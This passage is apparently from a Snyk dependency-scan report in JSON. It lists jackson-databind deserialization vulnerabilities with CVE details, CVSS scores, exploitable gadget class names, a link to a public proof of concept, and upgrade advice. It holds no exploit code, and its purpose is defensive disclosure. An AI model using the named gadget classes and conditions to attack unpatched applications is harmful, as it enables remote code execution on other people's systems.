Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using any of the following class gadget available within `weblogic/oracle-aqjms` if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\n* oracle.jms.AQjmsQueueConnectionFactory\r\n* oracle.jms.AQjmsXATopicConnectionFactory\r\n* oracle.jms.AQjmsTopicConnectionFactory\r\n* oracle.jms.AQjmsXAQueueConnectionFactory\r\n* oracle.jms.AQjmsXAConnectionFactory\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2698)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.91508", - "probability": "0.03404", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-14061" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-c2q3-4qrh-fm48" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-06-15T11:03:46.232208Z", - "functions_new": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-15T10:59:39Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-06-15T15:45:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.565244Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9.2)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.9.2", - "2.8.11.4", - "2.7.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", - "title": "GitHub Comparison" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2387", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2389", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2395", - "title": "GitHub Issue" - }, - { - "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", - "title": "Snyk Blog" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:46.065762Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:48:35.581531Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.009523Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:46.065762Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:35.581531Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14379](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", - "epssDetails": { - "percentile": "0.45827", - "probability": "0.00116", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14439" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-6fpp-rgj9-8rwc", - "GHSA-gwp4-hfv6-p7hw" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2023-11-14T13:41:26.478840Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2019-07-29T12:40:42Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-07-29T12:40:42Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:35.581531Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Tatu Saloranta" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.6)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.9.10.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.9.4,2.9.10.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", - "className": "SubTypeValidator", - "functionName": "validateSubType" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2814", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Kamimuka/cve-2020-24616-poc", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:13.383929Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:47.311633Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:03.282990Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:13.383929Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:47.311633Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `br.com.anteros.dbcp.AnterosDBCPDataSource` (aka Anteros-DBCP).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2814)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Kamimuka/cve-2020-24616-poc)\n", - "epssDetails": { - "percentile": "0.85138", - "probability": "0.01172", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-24616" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-08-26T11:28:06.617646Z", - "functions_new": [ - { - "version": [ - "[2.9.4,2.9.10.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.jsontype.impl.SubTypeValidator", - "functionName": "validateSubType" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-08-26T11:26:14Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-08-26T14:27:29Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:50:47.311633Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.4", - "2.8.11.2", - "2.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2052", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:48:41.204259Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:36.643590Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:45.496040Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:41.204259Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:36.643590Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12022`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14723` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2052)\n", - "epssDetails": { - "percentile": "0.81303", - "probability": "0.00770", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-12022" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-cjjf-94ff-43w7", - "GHSA-wrr7-33fx-rcvj" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:11:34.234921Z", - "functions_new": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-05-29T17:00:04Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:00:03Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:36.643590Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.4", - "2.8.11.2", - "2.9.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0, 2.8.11.2)", - "[2.9.0, 2.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2032", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 5.6, - "modificationTime": "2024-03-11T09:47:14.962980Z" - }, - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:26.624837Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:53.818908Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.6, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:14.962980Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:26.624837Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It may allow content exfiltration (remote access by sending contents over ftp) when untrusted content is deserialized with default typing enabled. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-11307`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-14723`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a 